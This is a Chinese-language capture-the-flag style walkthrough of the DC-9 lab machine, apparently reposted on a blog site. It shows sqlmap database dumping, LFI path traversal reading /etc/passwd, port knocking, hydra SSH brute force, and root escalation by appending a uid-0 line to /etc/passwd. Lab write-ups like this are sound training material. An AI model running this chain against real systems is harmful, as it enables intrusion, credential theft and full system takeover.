內網滲透-DC-9靶機滲透

攻擊機:kali?192.168.236.137

目標機:dc-9 192.168.236.138

一、信息收集
1.使用arp-scan -l和nmap進行主機發現和端口信息收集

nmap -sS -T5 --min-rate 10000 192.168.236.138 -sC -p-

發現22端口被阻塞

2.whatweb收集一下cms指紋信息

what http://192.168.236.138

3.訪問web界面,找一找,發現search這個地方可以查詢信息

這意味著與數據庫產生交互,可能會有注入

嘗試一下,'or 1=1 --+

這是一個sql注入,查看源碼發現跳轉界面是results.php,表單name為search

二、SQL注入

1.使用sqlmap -u?"http://192.168.236.138/results.php" --data "search=1" --dbs 爆庫名

2.使用sqlmap -u?"http://192.168.236.138/results.php" --data "search=1" -D Staff -T Users --dump字段內容

爆出一個用戶名和密碼

admin:transorbitall

3.爆另一個庫中的表的字段內容

4.使用admin登陸web界面,發現file does not exist(有可能存在文件包含)

三、文件包含(LFI)漏洞

猜測文件包含參數為file,

可以通過burp爆破一下

也可以通過FUZZ爆破

wfuzz -b 'PHPSESSID=4a2q7go730gbc8g8crv5q67l95' -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.236.138/manage.php?FUZZ=index.php

過濾

wfuzz --hw 100 -b 'PHPSESSID=4a2q7go730gbc8g8crv5q67l95' -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.236.138/manage.php?FUZZ=index.php

1.不知道在哪一層,直接填滿,使用../../../../../../../切一下路徑../../../../../etc/passwd

端口保護之端口敲門(knock)

就是按一定的順序訪問端口可以達到開啟和關閉某個端口的機制

3.端口敲門這個文件路徑一定在/etc/konckd.conf

http://192.168.236.138/welcome.php?file=../../../../../../../../../../../../../etc/konckd.conf

4 依次使用nc或者nmap敲門

nmap再次掃描一下發現22端口開放了

6.使用之前得到的用戶名和密碼去爆破ssh服務(使用九頭蛇hydra)

hydra -L username.txt(之前爆出的一堆用戶名) -P password.txt(之前爆出的一堆密碼) 192.168.236.138 ssh

7.使用janitor登陸,發現了一個密碼文件

8 猜測是密碼,放到之前密碼文件里再次爆破,得到一個新用戶

9.使用新用戶登錄,發現sudo -l可以使用,得到了一個可以以root身份執行的腳本

四、準備提權

1.根據提示找到腳本的位置,然后再它的前幾級目錄發現了它是一個python腳本,和它的使用方法

把第一個參數的內容追加到第二的參數中

2 使用openssl passwd -1 -salt admin 123456,生成一個加密的密碼

3.按照/etc/passwd的格式寫一個文件,通過test腳本追加到/etc/passwd中即可提權

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd

成功提權

得到flag

參考鏈接:

DC-9靶機滲透_在對靶場dc-9的滲透測試中攻擊目標是什么-CSDN博客

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/715374.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/715374.shtml
英文地址,請注明出處:http://en.pswp.cn/news/715374.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Vue開發實例(七)Axios的安裝與使用

說明: 如果只是在前端,axios常常需要結合mockjs使用,如果是前后端分離,就需要調用對應的接口,獲取參數,傳遞參數;由于此文章只涉及前端,所以我們需要結合mockjs使用;由于…

《熱辣滾燙》:用堅持不懈開啟逆境中的職場出路

"你只活一次,所以被嘲笑也沒有關系,想哭也沒有關系,失敗更沒有關系。" “人生就像一場拳擊賽,你站不起來,就永遠不知道自己有多強” “命運只負責洗牌,出牌的永遠是自己。” 在今年的賀歲檔電影市…

云時代【6】—— 鏡像 與 容器

云時代【6】—— 鏡像 與 容器 四、Docker(三)鏡像 與 容器1. 鏡像(1)定義(2)相關指令(3)實戰演習鏡像容器基本操作離線遷移鏡像鏡像的壓縮與共享 2. 容器(1)…

為什么模電這么難學?這是我見過最好的回答

大家好,我是磚一,有很多人抱怨模電難學,被譽為電子信息掛科率最高之一,下面聽我分析一下為啥模電這么難學? 01 理科的抽象思維 在高等教育體系中,模電是涉及半導體方向的第一門工程類課程,是一…

2024年3月5-7日年生物發酵裝備展-環科環保科技

參展企業介紹 山東環科環保科技有限公司,是一家集環保設備的設計、制造、安裝、服務及環境治理工程總承包于一體的企業。 公司長期專注于大氣、水、危固廢三大領域,以科技創造碧水藍天,為客戶提供環保解決方案。 以穩定的產品及服務質量、適用的技術、…

【環境搭建】linux centos7安裝mosquitto消息代理軟件操作步驟以及遇到問題日常記錄

最近需要用到mqtt, 選擇安裝mosquitto。由于安裝mosquitto花了我一點時間,簡單記錄下。安裝環境是linux centos7, 其他像windows、mac或者ubuntu 參考下 https://mosquitto.org/download/ 英文官網,或者別人寫的文章。 服務器…

微型世界:嵌入式科技的無限可能

微型世界:嵌入式科技的無限可能 1. 嵌入式科技的定義與特點 定義:嵌入式科技是一種特殊的計算機系統,通常用于特定的應用領域,如智能手機、智能家居設備等。特點:小巧、低功耗、高效率、實時性強、可靠性高、成本較低…

洛谷題單_搜索

P1219 [USACO1.5] 八皇后 Checker Challenge - 洛谷 | 計算機科學教育新生態 (luogu.com.cn) #include <bits/stdc.h> using namespace std; const int N14; int n,ans0; int a[N][N]{},vis[N][N]{}; vector<int>rcd(n1); void dfs(int dep){if(depn1){if(ans<…

有道QAnything背后的故事---關于RAG的一點經驗分享

近日&#xff0c;我們開源了有道自研的RAG&#xff08;Retrieval Augmented Generation) 引擎QAnything。該引擎允許用戶上傳PDF、圖片、Word、Excel、PowerPoint等多種格式的文檔&#xff0c;并實現類似于ChatGPT的互動問答功能&#xff0c;其中每個答案都能精確追溯到相應的文…

了解Spring中Bean:配置與作用域

作為一名對技術充滿熱情的學習者&#xff0c;我一直以來都深刻地體會到知識的廣度和深度。在這個不斷演變的數字時代&#xff0c;我遠非專家&#xff0c;而是一位不斷追求進步的旅行者。通過這篇博客&#xff0c;我想分享我在某個領域的學習經驗&#xff0c;與大家共同探討、共…

遞歸回溯剪枝-括號生成

LCR 085. 括號生成 - 力扣&#xff08;LeetCode&#xff09; 一. 根據題意&#xff0c;分析出符合要求的括號組合需要滿足以下兩個條件&#xff1a; 1. 左括號數或者右括號數都不能超過 n&#xff1b; 2. 從最左側開始的每一個子集&#xff0c;不可以出現右括號數大于左括號數&…

CF 1934B

冗長的代碼&#xff08;枚舉解法&#xff09; #include<bits/stdc.h>using namespace std;void solve() {int n;cin>>n;if(n1||n3||n6||n10||n15){cout<<1<<endl;return;}int cnt0;if(n>100){int tempn/15;if(temp>6){n-(temp-6)*15;cnttemp-6;…

算法復習之前綴和【備戰藍橋杯】

一維前綴和 S[i] a[1] a[2] ... a[i] a[l] ... a[r] S[r] - S[l - 1]二維前綴和 S[i, j] 第i行j列格子左上部分所有元素的和 以(x1, y1)為左上角&#xff0c;(x2, y2)為右下角的子矩陣的和為&#xff1a; S[x2, y2] - S[x1 - 1, y2] - S[x2, y1 - 1] S[x1 - 1, y1 - …

中國電子學會(CEIT)2020年06月真題C語言軟件編程等級考試四級(含詳細解析答案)

中國電子學會&#xff08;CEIT&#xff09;考評中心歷屆真題&#xff08;含詳細解析答案&#xff09; C語言軟件編程等級考試四級 2020年06月 編程題四道 總分:100分一、最長上升子序列&#xff08;25分&#xff09; 一個數的序列bi&#xff0c;當b1 < b2< … &l…

長期可用的文件二維碼怎么做?在線制作可修改的文件活碼

怎么做一個可以長期使用的文件二維碼呢&#xff1f;現在通過二維碼來傳遞文件是很流行的一種方式&#xff0c;將文件生成二維碼后印刷上墻或者分享給他人都可以快速完成文件的傳播&#xff0c;所以在下發通知、資料等方面用途較多。那么文件二維碼該如何生成呢&#xff1f; 想…

Linux內存地址空間

目錄 一、虛擬地址空間 1.虛擬地址空間的定義 2.虛擬地址空間的布局 二、內存壁壘 1.內存壁壘的定義?編輯 2.段錯誤 三、內存映射的建立與解除 &#xff08;1&#xff09;mmap &#xff08;2&#xff09;munmap &#xff08;3&#xff09;堆內存的分配和釋放 1.sbrk …

Android13 設置固定熱點ip地址192.168.43.1

Android13 設置固定熱點ip地址192.168.43.1 文章目錄 Android13 設置固定熱點ip地址192.168.43.1一、前言二、設置固定ip地址實現1、Android13 代碼中的實現&#xff1a;添加屬性寫法&#xff1a; 2、Android11 或者更舊的代碼中的實現&#xff1a; 三、其他1、Android 代碼獲連…

Python中學習調試requests模塊時出現的大坑(1)

為防止迷路: 學習機械相關,請關注公眾號:南大盛聯 學習軟件,硬件,請關注公眾號號:一訓微課 cmd模式下 不知道上面這行的話,需要補課。 pip install requests 這個不知道的話,也要補課 pip是python的安裝工具。 install是安裝的意思 requests是我們需要安裝的模…

HTML超鏈接去下劃線

當在HTML中創建超鏈接時&#xff0c;默認情況下會顯示為帶有下劃線的藍色文本。如果想要去掉下劃線&#xff0c;可以使用CSS樣式來實現。 示例代碼&#xff1a; <!DOCTYPE html> <html> <head> <style> a {text-decoration: none;color: blue; /* 設…

微信小程序 --- 事件處理

事件處理 一個應用僅僅只有界面展示是不夠的&#xff0c;還需要和用戶做交互&#xff0c;例如&#xff1a;響應用戶的點擊、獲取用戶輸入的值等等&#xff0c;在小程序里邊&#xff0c;我們就通過編寫 JS 腳本文件來處理用戶的操作 1. 事件綁定和事件對象 小程序中綁定事件與…